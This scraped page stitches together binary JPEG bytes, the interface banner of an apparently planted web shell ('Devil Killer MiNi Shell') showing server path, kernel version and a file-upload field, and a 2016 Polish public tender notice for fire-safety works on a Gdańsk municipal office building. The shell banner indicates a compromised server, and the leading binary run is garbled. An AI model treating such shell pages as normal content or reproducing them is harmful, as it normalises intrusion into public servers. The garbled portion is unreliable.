JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160719/142623-N-2016.html

<p class="kh_header"><b>Gdańsk: wykonanie robót budowlanych polegających na dostosowaniu  budynku przy ul. Partyzantów 74 B do obowiązujących przepisów p.poż</b><br>
<b>Numer ogłoszenia: 142623 - 2016; data zamieszczenia: 19.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gdański Zarząd Nieruchomości Komunalnych - Samorządowy Zakład Budżetowy , ul. Partyzantów 74, 80-254 Gdańsk, woj. pomorskie, tel. 58 3201032, 3200220, 3023282, faks 58 3458235.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gznk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie robót budowlanych polegających na dostosowaniu  budynku przy ul. Partyzantów 74 B do obowiązujących przepisów p.poż.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostosowanie budynku biurowego GZNK SZB  przy ul. Partyzantów 74 B  (działka nr 6/10, obręb 40) do obowiązujących przepisów  p.poż., polegające na wykonaniu wentylacji mechanicznej, instalacji elektrycznej SAP oraz oświetlenia  dróg ewakuacyjnych. <br>

Charakterystyczne parametry techniczne budynku: <br>
Powierzchnia użytkowa budynku 	                               -        1 041,51 m2<br>
Powierzchnia zabudowy				-	     313,79 m2<br>
Kubatura 				  -        4 626,25 m3<br>	     
Wysokość budynku  	-	       13,70 m. <br>

Budynek wybudowany w technologii  tradycyjnej, murowanej posiada cztery kondygnacje  nadziemne i jedną podziemną. Całość zabudowy składa się z części biurowej będącej przedmiotem opracowania oraz archiwum. <br>
Budynek wyposażony jest w instalacje: <br>
-	wodno-kanalizacyjną w tym instalacja ciepłej i zimnej wody, <br>
-	centralnego ogrzewania,<br> 
-	elektryczną i teletechniczną,<br> 
-	odgromową, <br>
-	wentylacji mechanicznej w części budynku, <br>
-	wentylacji grawitacyjnej, <br> 
-	Systemu sygnalizacji włamania i napadu (SSWiN) <br>
2.	Zakres robót obejmuje: <br>
2.1	Roboty budowlane: <br>
a)	wymianę drzwi przeciwpożarowych zamykających klatkę schodową, <br>
b)	wymianę drzwi wewnętrznych na drzwi aluminiowe szklone szkłem bezpiecznym na piętrach budynku z obu stron korytarza, <br>
c)	przesunięcie ścianki g-k z drzwiami I piętra, <br>
d)	prace szpachlarskie i malarskie, <br>
e)	roboty porządkowe. <br>
2.2	Roboty sanitarne: <br>
a)	demontaż wentylatorów łazienkowych, podejść kanałowych (leżaków) do kanałów wentylacji grawitacyjnych, nawietrzaków okiennych, kratek wentylacyjnych wentylacji grawitacyjnej, <br>
b)	prace komiarskie, <br>
c)	remont istniejącej instalacji wentylacji mechanicznej pomieszczeń, <br>
d)	modernizację  systemu wentylacji grawitacyjnej pozostałych pomieszczeń biurowych, <br>
e)	wykonanie systemu wentylacji mechanicznej wyciągowej pomieszczenia węzła cieplnego, <br>
f)	modernizację systemu wentylacji  pomieszczeń sanitarnych. <br>
2.3	Roboty elektryczne i SAP: <br>
a)	instalację oświetlenia ewakuacyjnego,<br>
b)	instalację oddymiania, <br>
c)	instalację sygnalizacji systemu pożaru SSP, <br>
d)	instalację zasilania wentylatorów z nowej rozdzielnicy.<br>
3.	Szczegółowy opis przedmiotu zamówienia stanowią: <br>
3.1.	Projekt budowlany remontu budynku biurowego B GZNK położonego w Gdańsku przy ul. Partyzantów 74 w zakresie poprawy warunków użytkowania, instalacji elektrycznych SAP oraz oświetlenia dróg ewakuacyjnych dz. nr 6/10, obręb 40  - załącznik nr 1 do siwz. <br>
1)	 Branża budowlana       				                          	- załącznik nr 1.1 do siwz. <br>
-	Rysunek nr 1 - Sytuacja w terenie	    				- załącznik nr 1.1.1 do siwz, <br>
-	Rysunek nr 2 - Rzut piwnicy   - projekt 	     		             	- załącznik nr 1.1.2 do siwz, <br>
-	Rysunek nr 3 - Rzut parteru   - projekt	    		            	- załącznik nr 1.1.3 do siwz, <br>
-	Rysunek nr 4 - Rzut I piętra   - projekt	    		             	- załącznik nr 1.1.4 do siwz, <br>
-	Rysunek nr 5 - Rzut II piętra  - projekt	    	                          	- załącznik nr 1.1.5 do siwz, <br>
-	Rysunek nr 6 - Rzut III piętra - projekt	     	                          	- załącznik nr 1.1.6 do siwz, <br>
-	Rysunek nr 7 - Przekrój A-A	     		                          	- załącznik nr 1.1.7 do siwz, <br>
-	Rysunek nr 8 - Zestawienie wymienianej stolarki drzwiowej        - załącznik nr 1.1.8 do siwz. <br>
2)	Instalacje elektryczne							- załącznik nr 1.2 do siwz, <br>
-	Rysunek nr E-11 str. 1/2 - Schemat  główny tablicy TP     		- załącznik nr 1.2.1 do siwz, <br>
-	Rysunek nr E-11 str. 2/2 - Schemat  główny tablicy TP      		- załącznik nr 1.2.2 do siwz, <br>
-	Rysunek nr E-12 str. 1/2 - Plan oświetlenia  ewakuacyjnego. 		
Piwnica			    							- załącznik nr 1.2.3 do siwz, <br>
-	Rysunek nr E-12 str. 2/2 - Plan oświetlenia  ewakuacyjnego. 		
Piwnica			    				- załącznik nr 1.2.4 do siwz, <br>
-	Rysunek nr E-13 str. 1/2 - Plan oświetlenia  ewakuacyjnego. 		
Parter			    				- załącznik nr 1.2.5 do siwz, <br>
-	Rysunek nr E-13 str. 2/2 - Plan oświetlenia  ewakuacyjnego. 		
Parter			    				- załącznik nr 1.2.6 do siwz, <br>
-	Rysunek nr E-14 str. 1/2 - Plan oświetlenia  ewakuacyjnego. 	 	
I Piętro			    				- załącznik nr 1.2.7 do siwz, <br>
-	Rysunek nr E-14 str. 2/2 - Plan oświetlenia  ewakuacyjnego. 		
I Piętro			    				- załącznik nr 1.2.8 do siwz, <br>
-	Rysunek nr E-15 str. 1/2 - Plan oświetlenia  ewakuacyjnego. 		
II Piętro			    				- załącznik nr 1.2.9 do siwz, <br>
-	Rysunek nr E-15 str. 2/2 - Plan oświetlenia  ewakuacyjnego. 		
II Piętro			    				- załącznik nr 1.2.10 do siwz, <br>
-	Rysunek nr E-16 str. 1/2 - Plan oświetlenia  ewakuacyjnego. 		
III Piętro 			    				- załącznik nr 1.2.11 do siwz, <br>
-	Rysunek nr E-16 str. 2/2 - Plan oświetlenia  ewakuacyjnego. 		
III Piętro			    				- załącznik nr 1.2.12 do siwz, <br>
-	Rysunek nr E-21 - Schemat instalacji SAP				- załącznik nr 1.2.13 do siwz, <br>
-	Rysunek nr E-22 str. 1/2 - Plan instalacji SAP  Piwnica		- załącznik nr 1.2.14 do siwz, <br>
-	Rysunek nr E-22 str. 2/2 - Plan instalacji SAP  Piwnica		- załącznik nr 1.2.15 do siwz, <br>
-	Rysunek nr E-23 str. 1/2 - Plan instalacji SAP  Parter		- załącznik nr 1.2.16 do siwz, <br>
-	Rysunek nr E-23 str. 2/2 - Plan instalacji SAP Parter			- załącznik nr 1.2.17 do siwz, <br>
-	Rysunek nr E-24 str. 1/2 - Plan instalacji SAP  I Piętro		- załącznik nr 1.2.18 do siwz, <br>
-	Rysunek nr E-24 str. 2/2 - Plan instalacji SAP  I Piętro		- załącznik nr 1.2.19 do siwz, <br>
-	Rysunek nr E-25 str. 1/2 - Plan instalacji SAP  II Piętro		- załącznik nr 1.2.20 do siwz, <br>
-	Rysunek nr E-25 str. 2/2 - Plan instalacji SAP  II Piętro		- załącznik nr 1.2.21 do siwz, <br>
-	Rysunek nr E-26 str. 1/2 - Plan instalacji SAP  III Piętro		- załącznik nr 1.2.22 do siwz, <br>
-	Rysunek nr E-26 str. 2/2 - Plan instalacji SAP  III Piętro		- załącznik nr 1.2.23 do siwz. <br>
3.2.	Projekt wykonawczy remontu budynku biurowego B GZNK położonego w Gdańsku przy ul. Partyzantów 74 w zakresie poprawy warunków użytkowania, instalacji elektrycznych SAP oraz oświetlenia dróg ewakuacyjnych dz. nr 6/10, obręb 40  - załącznik nr 2 do siwz. <br>
1)	Branża budowlana       				                          	- załącznik nr 2.1 do siwz<br>
-	Rysunek nr 1 - Sytuacja w terenie	    				- załącznik nr 2.1.1 do siwz, <br>
-	Rysunek nr 2 - Rzut piwnicy    - projekt 	     		         - załącznik nr 2.1.2 do siwz, <br>
-	Rysunek nr 3 - Rzut parteru    - projekt	    		             	- załącznik nr 2.1.3 do siwz, <br>
-	Rysunek nr 4 - Rzut I piętra    - projekt	    		            	- załącznik nr 2.1.4 do siwz, <br>
-	Rysunek nr 5 - Rzut II piętra   - projekt	    	                          	- załącznik nr 2.1.5 do siwz, <br>
-	Rysunek nr 6 - Rzut III piętra  - projekt	     	                          	- załącznik nr 2.1.6 do siwz, <br>
-	Rysunek nr 7 - Przekrój A-A	     		                          	- załącznik nr 2.1.7 do siwz, <br>
-	Rysunek nr 8 - Zestawienie wymienianej stolarki drzwiowej        	- załącznik nr 2.1.8 do siwz. <br>
2)	Instalacje elektryczne					             	- załącznik nr 2.2 do siwz<br>
-	Rysunek nr E-11 str. 1/2 - Schemat  główny tablicy TP     		- załącznik nr 2.2.1 do siwz<br>
-	Rysunek nr E-11 str. 2/2 - Schemat  główny tablicy TP      		- załącznik nr 2.2.2 do siwz, <br>
-	Rysunek nr E-12 str. 1/2 - Plan oświetlenia  ewakuacyjnego. 		
	Piwnica			    				- załącznik nr 2.2.3 do siwz, <br>
-	Rysunek nr E-12 str. 2/2 - Plan oświetlenia  ewakuacyjnego. 		
	Piwnica			    				- załącznik nr 2.2.4 do siwz, <br>
-	Rysunek nr E-13 str. 1/2 - Plan oświetlenia  ewakuacyjnego. 		
	Parter			    				- załącznik nr 2.2.5 do siwz, <br>
-	Rysunek nr E-13 str. 2/2 - Plan oświetlenia  ewakuacyjnego. 		
	Parter			    				- załącznik nr 2.2.6 do siwz, <br>
-	Rysunek nr E-14 str. 1/2 - Plan oświetlenia  ewakuacyjnego. 		
	I Piętro			    				- załącznik nr 2.2.7 do siwz, <br>
-	Rysunek nr E-14 str. 2/2 - Plan oświetlenia  ewakuacyjnego. 		
	I Piętro			    				- załącznik nr 2.2.8 do siwz, <br>
-	Rysunek nr E-15 str. 1/2 - Plan oświetlenia  ewakuacyjnego. 		
	II Piętro			    				- załącznik nr 2.2.9 do siwz, <br>
-	Rysunek nr E-15 str. 2/2 - Plan oświetlenia  ewakuacyjnego. 		
	II Piętro			    				- załącznik nr 2.2.10 do siwz, <br>
-	Rysunek nr E-16 str. 1/2 - Plan oświetlenia  ewakuacyjnego. 		
	III Piętro 			    				- załącznik nr 2.2.11 do siwz, <br>
-	Rysunek nr E-16 str. 2/2 - Plan oświetlenia  ewakuacyjnego. 		
III Piętro			    				- załącznik nr 2.2.12 do siwz, <br>
-	Rysunek nr E-21 - Schemat instalacji SAP				- załącznik nr 2.2.13 do siwz, <br>
-	Rysunek nr E-22 str. 1/2 - Plan instalacji SAP  Piwnica		- załącznik nr 2.2.14 do siwz, <br>
-	Rysunek nr E-22 str. 2/2 - Plan instalacji SAP  Piwnica		- załącznik nr 2.2.15 do siwz, <br>
-	Rysunek nr E-23 str. 1/2 - Plan instalacji SAP  Parter		- załącznik nr 2.2.16 do siwz, <br>
-	Rysunek nr E-23 str. 2/2 - Plan instalacji SAP Parter			- załącznik nr 2.2.17 do siwz, <br>
-	Rysunek nr E-24 str. 1/2 - Plan instalacji SAP  I Piętro		- załącznik nr 2.2.18 do siwz, <br>
-	Rysunek nr E-24 str. 2/2 - Plan instalacji SAP  I Piętro		- załącznik nr 2.2.19 do siwz, <br>
-	Rysunek nr E-25 str. 1/2 - Plan instalacji SAP  II Piętro		- załącznik nr 2.2.20 do siwz, <br>
-	Rysunek nr E-25 str. 2/2 - Plan instalacji SAP  II Piętro		- załącznik nr 2.2.21 do siwz, <br>
-	Rysunek nr E-26 str. 1/2 - Plan instalacji SAP  III Piętro		- załącznik nr 2.2.22 do siwz, <br>
-	Rysunek nr E-26 str. 2/2 - Plan instalacji SAP  III Piętro		- załącznik nr 2.2.23 do siwz. <br>
3.3.	Projekt Budowlany - Projekt budowlany instalacji wentylacji mechanicznej budynku biurowego B Gdańskiego Zarządu  Nieruchomości  Komunalnych - Samorządowego  Zakładu  Budżetowego położonego  w Gdańsku przy ul. Partyzantów 74 (dz. nr 6/10, obręb 40)  		- załącznik nr 3 do siwz <br>
1)	Branża budowlana       				            		- załącznik nr 3.1 do siwz<br>
-	Rysunek nr 1 - Plan Sytuacyjny	    				- załącznik nr 3.1.1 do siwz, <br>
-	Rysunek nr W1 - Wentylacja - Rzut piwnicy 	     			- załącznik nr 3.1.2 do siwz, <br>
-	Rysunek nr W2 - Wentylacja rzut parteru 	     		         - załącznik nr 3.1.3 do siwz, <br>
-	Rysunek nr W3 - Wentylacja rzut I piętra	     		         - załącznik nr 3.1.4 do siwz, <br>
-	Rysunek nr W4 - Wentylacja rzut II piętra	     		         - załącznik nr 3.1.5 do siwz, <br>
-	Rysunek nr W5 - Wentylacja rzut III piętra	     		 	- załącznik nr 3.1.6 do siwz, <br>
-	Rysunek nr W6 - Wentylacja rzut dachu     		              	- załącznik nr 3.1.7 do siwz, <br>
-	Rysunek nr W7 - Wentylacja Przekrój A-A				- załącznik nr 3.1.8 do siwz. <br>
2)	Instalacje elektryczne							- załącznik nr 3.2 do siwz, <br>
-	Rysunek nr E-01 -  Schemat  główny tablicy TW     			- załącznik nr 3.2.1 do siwz, <br>
-	Rysunek nr E-02 -  Widok tablicy TW     					- załącznik nr 3.2.2 do siwz, <br>
-	Rysunek nr E-03 - Plan Instalacji elektr. 
	Wentylacja  - III pietro     						- załącznik nr 3.2.3 do siwz, <br>
-	Rysunek nr E-04 str. 1/2 - Plan Instalacji elektr. 
	Wentylacja  - dach     						- załącznik nr 3.2.4 do siwz, <br>
-	Rysunek nr E-04 str. 2/2 - Plan Instalacji elektr. 
	Wentylacja  - dach     						- załącznik nr 3.2.5 do siwz, <br>
-	Rysunek nr E-05 - Plan Instalacji elektr. 
-	Wentylacja  - węzeł cieplny     						- załącznik nr 3.2.6 do siwz. <br>
3.4.	Projekt Wykonawczy - Projekt budowlany instalacji wentylacji mechanicznej budynku biurowego B Gdańskiego Zarządu  Nieruchomości  Komunalnych - Samorządowego  Zakładu  Budżetowego położonego  w Gdańsku przy ul. Partyzantów 74 (dz. nr 6/10, obręb 40)  		- załącznik nr 4 do siwz, <br>
1) Branża budowlana       				             		- załącznik nr 4.1 do siwz, <br>
-	Rysunek nr 1 - Plan Sytuacyjny	    				- załącznik nr 4.1.1 do siwz, <br>
-	Rysunek nr W1 - Wentylacja - Rzut piwnicy 	     			- załącznik nr 4.1.2 do siwz, <br>
-	Rysunek nr W2 - Wentylacja rzut parteru 	     		          - załącznik nr 4.1.3 do siwz, <br>
-	Rysunek nr W3 - Wentylacja rzut I piętra	     		          - załącznik nr 4.1.4 do siwz, <br>
-	Rysunek nr W4 - Wentylacja rzut II piętra	     		         - załącznik nr 4.1.5 do siwz, <br>
-	Rysunek nr W5 - Wentylacja rzut III piętra	     			- załącznik nr 4.1.6 do siwz, <br>
-	Rysunek nr W6 - Wentylacja rzut dachu     		            	- załącznik nr 4.1.7 do siwz, <br>
-	Rysunek nr W7 - Wentylacja Przekrój A-A				- załącznik nr 4.1.8 do siwz. <br>
2)	Instalacje elektryczne							- załącznik nr 4.2 do siwz, <br>
-	Rysunek nr E-01 - Schemat  główny tablicy TW     			- załącznik nr 4.2.1 do siwz, <br>
-	Rysunek nr E-02 - Widok tablicy TW     					- załącznik nr 4.2.2 do siwz, <br>
-	Rysunek nr E-03 - Plan Instalacji elektr. 
	Wentylacja  - III pietro     						- załącznik nr 4.2.3 do siwz, <br>
-	Rysunek nr E-04 str. 1/2 - Plan Instalacji elektr. 
	Wentylacja  - dach     						- załącznik nr 4.2.4 do siwz<br>
-	Rysunek nr E-04 str. 2/2 - Plan Instalacji elektr. 
	Wentylacja  - dach     						- załącznik nr 4.2.5 do siwz<br>
-	Rysunek nr E-05 - Plan Instalacji elektr. 
	Wentylacja  - węzeł cieplny     						- załącznik nr 4.2.6 do siwz<br>
3.5.	Specyfikacja techniczna do projektu budowlanego remontu budynku biurowego B GZNK położonego w Gdańsku  przy ul. Partyzantów 74 w zakresie  poprawy warunków użytkowania, instalacji elektrycznych SAP oraz oświetlenia  dróg ewakuacyjnych dz. nr 6/10, obręb 40 - załącznik nr 5 do siwz. <br>
3.6.	Specyfikacja techniczna wykonania i odbioru robót. Remont budynku biurowego B GZNK położonego w Gdańsku przy ul. Partyzantów 74 - instalacje elektryczne SAP oraz oświetlenia dróg ewakuacyjnych - Roboty instalacji elektrycznych - załącznik nr 6 do siwz. <br>
3.7.	Specyfikacja techniczna wykonania i odbioru robót. Wentylacja mechaniczna pomieszczeń w budynku biurowym B Gdańskiego Zarządu  Nieruchomości  Komunalnych Samorządowego  Zakładu  Budżetowego  w Gdańsku ul. Partyzantów 74 - Roboty elektryczne - załącznik nr 7 do siwz. <br>
3.8.	 Specyfikacja techniczna wykonania i odbioru robót. Projekt wentylacji mechanicznej hybrydowej w  biurowym B zlokalizowanego w Gdańsku ul. Partyzantów 74 - Roboty instalacyjne. Instalacja wentylacji  - załącznik nr 8 do siwz. <br>
3.9.	Przedmiary - remontu budynku biurowego B  GZNK położonego w Gdańsku przy ul. Partyzantów 74 w zakresie poprawy warunków użytkowania, instalacji elektrycznej SAP oraz oświetlenia  dróg ewakuacyjnych Gdańsk ul. Partyzantów 74 - branża ogólnobudowlana - załącznik nr 9 do siwz. <br>
3.10.	Przedmiar robót. Dostosowanie  budynku  B GZNK do przepisów p. pożarowych Gdańsk, ul. Partyzantów 74 - branża elektryczna - załącznik nr 10 do siwz. <br>
3.11.	Przedmiar robót. Budynek biurowy B  GZNK - instalacje elektryczne wentylacji: węzeł cieplny, III piętro i dach Gdańsk, ul. Partyzantów 74 - branża elektryczna - załącznik nr 11 do siwz. <br>
3.12.	Przedmiar robót. Budynek Biurowy B  GZNK - Instalacja wentylacji  mechanicznej, higrosterowna + prace kominiarskie - załącznik nr 12 do siwz.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.13.00-4, 45.31.12.00-2, 45.31.21.00-8, 45.31.43.00-4, 45.31.70.00-2, 45.33.12.10-1, 45.40.00.00-1, 45.41.00.00-4, 45.42.10.00-4, 45.44.21.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości  6 000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku posiadania wiedzy i doświadczenia Wykonawca musiał wykonać w okresie ostatnich pięciu lat przed upływem terminu składania ofert minimum 2 roboty budowlane polegające na wykonaniu robót remontowych w czynnych obiektach  użyteczności publicznej w zakresie robót elektrycznych i sanitarnych o wartości nie mniejszej niż 200 000,00 zł brutto każda.<br>

W przypadku Wykonawców, którzy będą wspólnie ubiegali się o udzielenie zamówienia w/w warunek nie będzie podlegał sumowaniu. Realizacją wymaganych robót winien wykazać się wykonawca albo co najmniej jeden z uczestników konsorcjum.<br>
Warunek wiedzy i doświadczenia nie będzie spełniony, jeżeli uczestnicy konsorcjum w sumie  wykażą zrealizowanie dwóch w/w robót, ale żaden z nich nie wykona ich w wymaganej liczbie, tzn., że w przypadku wykazania przez każdego uczestnika konsorcjum po 1 robocie budowlanej, warunek dotyczący posiadania  wiedzy i doświadczenia nie zostanie spełniony.<br>

W sytuacji gdy Wykonawca nie ma wymaganego doświadczenia może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków udowadniając, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia. Podmiot na którego wiedzy i doświadczeniu wykonawca polega będzie musiał wykazać zrealizowanie  2 robót budowlanych w zakresie określonym przez zamawiającego w siwz oraz musi być wskazany jako  podwykonawca, który będzie realizował  kluczowe roboty  budowlane określone  w przedmiocie zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca musi wykazać dysponowanie 7 osobami w tym:<br>

-	1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,<br>
-	1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,<br>
-	1 osobą posiadającą uprawnienia do wykonywania pracy na stanowisku eksploatacji w zakresie montażu, remontu, kontrolno-pomiarowym urządzeń i instalacji należących do Grupy 1.   Urządzenia, instalacje i sieci elektroenergetyczne wytwarzające,  przetwarzające, przesyłające i zużywające energię elektryczną dla urządzeń i instalacji o napięciu nie wyższym niż 1 kV, zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy  i Polityki Społecznej z dnia 28.04.2003 r. w sprawie szczegółowych zasad stwierdzania  kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci. (Dz.U. nr  89 poz. 828 z późn. zm.).<br>
Wymienione uprawnienia powinny upoważniać do wykonywania pomiarów ochronnych instalacji do 1 kV.
-	4 osobami do wykonywania robót budowlanych.<br>

Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.<br>

